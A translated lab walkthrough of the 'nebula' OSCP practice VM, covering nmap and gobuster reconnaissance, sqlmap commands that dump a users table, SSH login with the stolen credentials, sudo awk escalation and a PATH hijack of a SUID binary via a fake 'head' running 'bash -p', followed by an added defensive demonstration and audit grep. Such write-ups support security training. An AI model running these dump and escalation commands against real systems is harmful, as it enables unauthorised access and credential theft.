【OSCP】nebula

admin, published 2024-04-15 03:26:47

Lab overview

Target: nebula
Difficulty: easy
Topics: information gathering, vulnerability discovery, SQL injection, sudo awk privilege escalation, SUID privilege escalation, $PATH environment variable privilege escalation

Information gathering

Host discovery

nmap -sn 192.168.1.0/24

[screenshot]

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.232
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-10 05:09 EST
Nmap scan report for 192.168.1.232
Host is up (0.0018s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA)
| 256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA)
|_ 256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Nebula Lexus Labs
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:FA:F9:B9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.84 ms 192.168.1.232

Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.232 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.232
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.232/.php (Status: 403) [Size: 278]
http://192.168.1.232/index.php (Status: 200) [Size: 3479]
http://192.168.1.232/.html (Status: 403) [Size: 278]
http://192.168.1.232/img (Status: 301) [Size: 312] [--> http://192.168.1.232/img/]
http://192.168.1.232/login (Status: 301) [Size: 314] [--> http://192.168.1.232/login/]
http://192.168.1.232/joinus (Status: 301) [Size: 315] [--> http://192.168.1.232/joinus/]
http://192.168.1.232/.html (Status: 403) [Size: 278]
http://192.168.1.232/.php (Status: 403) [Size: 278]
http://192.168.1.232/server-status (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

[screenshots]

Log into the backend with the account and password leaked above.

[screenshot]

Gaining access

After logging in, the application turns out to have a SQL injection vulnerability.

[screenshots]

sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd"
sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd" -D nebuladb --tables
sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd" -D nebuladb -T users --dump

Dumping the users table yields the pmccentral account and its password; logging in over SSH with them succeeds and gives a shell on the system.

[screenshots]

Privilege escalation

In the documents directory there is a file that looks like a wordlist, but brute-forcing with it fails.

[screenshots]

Through sudo awk we escalate to the laboratoryadmin account.

[screenshot]

Here there is a SUID binary and a fake head file whose contents are bash -p. Running strings on PMCEmployees shows that it executes head /home/pmccentral/documents/employees.txt. So by modifying the $PATH environment variable we can make the head command run inside PMCEmployees resolve to that fake head file instead.

[screenshots]

laboratoryadmin@laboratoryuser:~/autoScripts$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
laboratoryadmin@laboratoryuser:~/autoScripts$ PATH=$(pwd):$PATH
laboratoryadmin@laboratoryuser:~/autoScripts$ echo $PATH
/home/laboratoryadmin/autoScripts:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

PATH=$(pwd):$PATH is a command used on Linux and other Unix-like systems to modify the PATH environment variable. PATH defines the list of directories the system searches when looking for an executable.

  • $(pwd) is a command substitution that is replaced by the path of the current working directory.

  • $PATH is the current value of the PATH environment variable.

So PATH=$(pwd):$PATH prepends the current working directory to PATH. As a result, when you try to run a program, the system looks for the executable in the current directory first and only then in the other directories listed in PATH, in order.
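The PATH lookup just described, seen from the defender's side: an added example (not from the original post) that builds two throwaway directories standing in for the trusted /usr/bin and the writable ~/autoScripts, shows which head a bare-name call resolves to once PATH has been prefixed, and then applies the two standard fixes (reset PATH inside the helper, or call the tool by absolute path) together with a grep that audits scripts for bare-name calls. The directory names, the stand-in head scripts and the before/after helper scripts are all constructed here.

```shell
#!/bin/sh
# Added example, not from the original post. Two throwaway directories are
# constructed to stand in for the trusted /usr/bin and the writable ~/autoScripts;
# no real SUID binary is involved.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/trusted" "$WORK/writable"

# Constructed stand-ins for the real head and for a fake head placed next to it.
printf '#!/bin/sh\necho trusted-head\n' > "$WORK/trusted/head"
printf '#!/bin/sh\necho fake-head\n'    > "$WORK/writable/head"
chmod 755 "$WORK/trusted/head" "$WORK/writable/head"

# Which head would a helper pick up if it inherits PATH=$1? command -v performs
# the same left-to-right search a bare command name gets; hash -r drops any cache.
resolve_head() {
    ( PATH="$1"; export PATH; hash -r 2>/dev/null; command -v head )
}

# Vulnerable pattern: run `head` by bare name under whatever PATH the caller set.
run_head() {
    ( PATH="$1"; export PATH; hash -r 2>/dev/null; head </dev/null )
}

# Fix 1: the helper resets PATH to a trusted value before running anything, so the
# caller's PATH=$(pwd):$PATH prefix (passed as $1) is deliberately ignored.
run_head_hardened() {
    ( PATH="$WORK/trusted"; export PATH; hash -r 2>/dev/null; head </dev/null )
}

# Fix 2 / audit check: invoke tools by absolute path. This grep flags lines of a
# script that call common utilities by bare name and prints nothing when clean.
audit_bare_commands() {
    grep -nE '(^|[;&|`(] *)(head|tail|cat|cp|mv|rm|awk) ' "$1" || true
}

# Constructed stand-ins for the helper's call, before and after applying fix 2.
printf 'head /home/pmccentral/documents/employees.txt\n'          > "$WORK/before.sh"
printf '/usr/bin/head /home/pmccentral/documents/employees.txt\n' > "$WORK/after.sh"

# Demonstration when run directly.
echo "caller prefixed PATH resolves to: $(resolve_head "$WORK/writable:$WORK/trusted")"
echo "helper that resets PATH prints:   $(run_head_hardened "$WORK/writable:$WORK/trusted")"
echo "audit before fix: $(audit_bare_commands "$WORK/before.sh")"
echo "audit after fix:  [$(audit_bare_commands "$WORK/after.sh")]"
```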

[screenshot]

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】nebula

Reposted on CN-SEC with thanks to the original author; please keep this link when reposting: https://cn-sec.com/archives/2658293.html